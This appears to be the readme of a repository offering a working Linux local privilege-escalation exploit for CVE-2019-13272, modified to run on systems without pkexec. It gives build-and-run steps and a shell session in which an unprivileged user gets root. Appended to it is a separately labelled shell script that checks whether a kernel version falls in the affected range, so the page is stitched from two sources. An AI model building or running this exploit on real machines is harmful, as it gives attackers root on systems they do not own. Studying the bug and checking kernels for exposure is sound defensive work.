exp.c
fakehelper.c
fakepkexec.c
make.sh
readme.md


CVE-2019-13272

Exploit

This bug was found by Jann Horn, great job! His exploit relies on the pkexec tool, which does not exist on non-desktop systems.

To make this bug more convenient to study, I modified his exploit code to use a 'fakepkexec' helper, so that the modified exploit can be used on any Unix system with kernel = Linux 4.10 < 5.1.17.

  • EXP: run 'sh make.sh' with root permission to build, then run /tmp/exp with non-root permission to get a root shell:
root@ubuntu:/tmp/EXP-CVE-2019-13272# sh make.sh 
$ id
uid=1001(test) gid=1001(test) groups=1001(test) context=system_u:system_r:kernel_t:s0
$ /tmp/exp	
executing passwd
attached to midpid
root@ubuntu:/tmp/EXP-CVE-2019-13272# id
uid=0(root) gid=0(root) groups=0(root),1001(test) context=system_u:system_r:kernel_t:s0
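
A triage check for the kernel range stated above, as an added example that is not part of this repository: it treats 4.10 as inclusive and 5.1.17 as exclusive (an assumption about how the readme's range is meant), and the function names are hypothetical. It compares only the upstream version at the start of the release string, so a distribution kernel carrying a backported fix is still reported as in range and needs a look at the vendor advisory.

```shell
#!/bin/sh
# Added example, not the repository's code: compare a kernel release string
# with the range given in the readme (4.10 < 5.1.17).

# kver_to_int RELEASE: print major*1000000 + minor*10000 + patch, or fail.
kver_to_int() {
    # Cut at the first character that is not a digit or dot:
    # "4.15.0-54-generic" -> "4.15.0", "5.2-rc1" -> "5.2"
    base=${1%%[!0-9.]*}
    case $base in
        [0-9]*.[0-9]*) ;;
        *) return 1 ;;          # no "major.minor" prefix found
    esac
    old_ifs=$IFS
    IFS=.
    set -- $base                # split on dots into $1 $2 $3
    IFS=$old_ifs
    echo $(( $1 * 1000000 + $2 * 10000 + ${3:-0} ))
}

# in_readme_range RELEASE: 0 = inside range, 1 = outside, 2 = unparsable.
in_readme_range() {
    v=$(kver_to_int "$1") || return 2
    lo=$(kver_to_int 4.10)      # lower bound from the readme, assumed inclusive
    hi=$(kver_to_int 5.1.17)    # upper bound from the readme, assumed exclusive
    [ "$v" -ge "$lo" ] && [ "$v" -lt "$hi" ]
}

# Check the release given as the first argument, or the running kernel.
rel=${1:-$(uname -r)}
rc=0
in_readme_range "$rel" || rc=$?
case $rc in
    0) echo "$rel: inside 4.10 < 5.1.17, confirm patch status with the vendor" ;;
    1) echo "$rel: outside 4.10 < 5.1.17" ;;
    *) echo "$rel: could not parse kernel release" ;;
esac
```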

Reference
